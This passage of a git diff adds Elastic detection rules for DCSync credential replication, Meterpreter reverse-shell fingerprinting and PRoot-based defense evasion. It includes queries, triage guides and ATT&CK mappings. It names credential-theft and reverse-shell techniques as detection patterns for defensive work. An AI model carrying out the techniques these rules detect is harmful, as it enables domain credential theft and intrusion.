+ "id": "5c602cba-ae00-4488-845d-24de2b6d8055_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_10.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_10.json new file mode 100644 index 00000000000..a4d59dab357 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_10.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", + "from": "now-9m", + "history_window_start": "now-15d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "FirstTime Seen Account Performing DCSync", + "new_terms_fields": [ + "winlog.event_data.SubjectUserName" + ], + "note": "## Triage and analysis\n\n### Investigating FirstTime Seen Account Performing DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys that are used legitimately for creating tickets, but also for forging tickets by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for when a Windows Event ID 4662 (Operation was performed on an Active Directory object) with the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set) is seen in the environment for the first time in the last 15 days.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom accounts on Azure AD Connect; investigate if this is part of a new Azure AD account setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. Investigate if this is part of a new product setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.action:(\"Directory Service Access\" or \"object-operation-performed\") and event.code:\"4662\" and\n winlog.event_data.Properties:(*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or\n *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or\n *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and\n not winlog.event_data.SubjectUserName:(*$ or MSOL_*)\n", + "references": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", + "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", + "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", + "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.006", + "name": "DCSync", + "reference": "https://attack.mitre.org/techniques/T1003/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 10 + }, + "id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_9.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_9.json new file mode 100644 index 00000000000..bdc8e3f2e28 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_9.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", + "from": "now-9m", + "history_window_start": "now-15d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "FirstTime Seen Account Performing DCSync", + "new_terms_fields": [ + "winlog.event_data.SubjectUserName" + ], + "note": "## Triage and analysis\n\n### Investigating FirstTime Seen Account Performing DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys that are used legitimately for creating tickets, but also for forging tickets by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for when a Windows Event ID 4662 (Operation was performed on an Active Directory object) with the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set) is seen in the environment for the first time in the last 15 days.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom accounts on Azure AD Connect; investigate if this is part of a new Azure AD account setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. Investigate if this is part of a new product setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "event.action:(\"Directory Service Access\" or \"object-operation-performed\") and event.code:\"4662\" and\n winlog.event_data.Properties:(*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or\n *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or\n *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and\n not winlog.event_data.SubjectUserName:(*$ or MSOL_*)\n", + "references": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", + "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", + "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", + "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.006", + "name": "DCSync", + "reference": "https://attack.mitre.org/techniques/T1003/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_5.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_5.json new file mode 100644 index 00000000000..a72ae602efc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_5.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Meterpreter Reverse Shell", + "query": "sample by host.id, process.pid, user.id\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5c895b4f-9133-4e68-9e23-59902175355c", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -w /proc/net/ -p r -k audit_proc\n -w /etc/machine-id -p wa -k machineid\n -w /etc/passwd -p wa -k passwd\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "5c895b4f-9133-4e68-9e23-59902175355c_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_6.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_6.json new file mode 100644 index 00000000000..f8d80b08650 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_6.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Meterpreter Reverse Shell", + "query": "sample by host.id, process.pid, user.id\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5c895b4f-9133-4e68-9e23-59902175355c", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -w /proc/net/ -p r -k audit_proc\n -w /etc/machine-id -p wa -k machineid\n -w /etc/passwd -p wa -k passwd\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "5c895b4f-9133-4e68-9e23-59902175355c_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_6.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_6.json new file mode 100644 index 00000000000..d6c836600a1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_6.json @@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Defense Evasion via PRoot", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and process.parent.name == \"proot\"\n", + "references": [ + "https://proot-me.github.io/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5c9ec990-37fa-4d5c-abfc-8d432f3dedd0", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1211", + "name": "Exploitation for Defense Evasion", + "reference": "https://attack.mitre.org/techniques/T1211/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_6", + "type": "security-rule" +} \ No newline at end of file diff --git 